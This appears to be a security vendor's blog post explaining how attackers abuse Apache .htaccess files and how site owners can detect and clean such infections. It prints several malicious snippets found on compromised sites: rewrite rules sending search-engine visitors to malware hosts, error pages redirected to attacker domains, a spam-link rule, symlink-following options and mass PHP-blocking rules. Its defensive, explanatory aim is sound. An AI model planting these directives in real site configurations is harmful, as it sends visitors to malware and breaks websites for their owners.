The .htaccess file is notorious for being targeted by attackers. Whether it’s using the file to hide malware, redirect search engines to other sites with black hat SEO tactics, or inject content — the range of possibilities for misuse is vast, making it a prime target for hackers.
.htaccess malware can be hard to pinpoint and clean up since it allows an attacker to make multiple changes to the web server and its behavior. Furthermore, many site owners are unaware of this file due to it starting with a “.” (which makes it a hidden file). However, understanding the intricacies of the .htaccess file and its potential misuse is crucial for mitigating risk to your website. The stealthy nature of .htaccess malware, coupled with its ability to manipulate server behavior, makes it a silent yet potent threat.
In this post, we’ll explain what an .htaccess file is and why it’s such an attractive target for attackers. We’ll also cover some common examples of .htaccess malware and how to detect and respond to these threats to help protect your website and visitors.
Contents:
The .htaccess file is a very versatile and powerful file specific to Apache server environments. It allows web administrators to make changes to the environment as a whole, or, on a per-directory basis. It can allow or deny access to certain IP addresses, referrers, and user agents.
It is also used to enable things like “pretty permalinks” in WordPress environments with the use of mod_rewrite. It is a very flexible and useful file — and that’s precisely why attackers will misuse this file for their own goals.
Let’s take a look at some common examples of .htaccess malware that you may find if your site has been compromised.
One of the more common attacks we’ve encountered is .htaccess redirects. This redirects users from search engines to malware utilizing the following instruction set :
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ hxxp://villusoftreit[.]ru/in.cgi?3 [R=301,L]
This script checks the referrer for anyone visiting the site from the search engines listed, and then proceeds to redirect the user to a page with malware. (I.E. hxxp://villusoftreit[.]ru/in.cgi?3) Website owners are more likely to visit their website by entering the domain directly into their address bar, rather than through a search engine. This makes it less likely that the website owner will notice the infection until they are told about it by someone.
Here’s another example of an .htaccess redirect:
# BEGIN WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* hxxp://globalpoweringgatheringon[.]com/in.php?n=30 [R,L]
Another common type of attack involving the .htaccess file is redirecting error pages to malware, which can be even harder to detect. This is because most of the website functions normally. The redirect will only trigger on non-existent pages.
Here’s an example of what you’d find involving this type of attack:
RewriteEngine On ErrorDocument 400 hxxp://powercrystal[.]ru/inject/index.php ErrorDocument 401 hxxp://powercrystal[.]ru/inject/index.php ErrorDocument 403 hxxp://powercrystal[.]ru/inject/index.php ErrorDocument 404 hxxp://powercrystal[.]ru/inject/index.php ErrorDocument 500 hxxp://powercrystal[.]ru/inject/index.php Another example: ErrorDocument 400 hxxp://arthurlundt.cz[.]cc/ht_er_docs/ ErrorDocument 403 hxxp://arthurlundt.cz[.]cc/ht_er_docs/ […truncated…] ErrorDocument 404 hxxp://nicomagen.cz[.]cc/ht_er_docs/ ErrorDocument 405 hxxp://nicomagen.cz[.]cc/ht_er_docs/
Another way we have seen the .htaccess file abused is through spam link generation:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This malware uses a regular expression that – when coupled with spam malware within the file structure – can generate hundreds of spam links on the website. This will then show up in Google and other search engine search results and harm the website’s SEO.
A very common attack with WHM/cPanel environments is the misuse of symlinks. If symlink protection is disabled within WHM, attackers can use symlinks to move laterally throughout the environment and infect other websites or just create a flood of random spammy symlinks spread across the file structure.
This is made possible in part with the use of an .htaccess file placed in the directory in question:
Options +FollowSymLinks DirectoryIndex Index.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php
This will instruct the server to follow symlinks to their destination and aid the attackers in spreading their malware throughout the environment.
Another attack that we have seen a lot of recently is the abuse of .htaccess files to deny access to website files. For example, we have seen the attackers litter hundreds, or sometimes thousands of .htaccess files throughout the website file structure with the following:
<FilesMatch ‘.(php|php5|phtml)$’> Order allow,deny Deny from all </FilesMatch>
This is a very simple .htaccess file which does nothing other than prevent PHP execution.
The file can function as a hardening measure when placed in a directory such as ./wp-content/uploads. However, when littered throughout the entire file structure, it can disrupt the functionality of the website and render the wp-admin panel useless. It does this by blocking the website administrator from performing maintenance, updates, or taking down the entire website.
Our free remote website scanner SiteCheck is able to detect many of these .htaccess attacks on your site. Simply enter your URL into the search bar and SiteCheck will scan your site for malicious code.
Remote scanners do have limitations, however. For a complete website scan you’ll also want to scan your website server and database for any suspicious code and indicators of compromise. Learn more about this functionality from our website monitoring page or chat with one of our experienced analysts to discuss implementation.
Detected malicious .htaccess behavior or related indicators of compromise? We’ve put together a comprehensive step-by-step guide on how to fix a hacked website.
As a quick recap, you’ll want to do the following if your site has malware:
If you’ve been hacked and you need a hand cleaning up the infection, our experienced security analysts are available 24/7 to help clean up an infection. Reach out — they love to chat!
The best way to prevent an infection in the first place is to proactively implement security measures. That means hardening your website, using strong passwords for all of your accounts, and securing your site against vulnerabilities and threats. Sucuri offers a comprehensive website security service that can help you monitor your site and respond to threats.
Not sure about getting complete website security right now? Try our website firewall free for 30-days and see the results for yourself.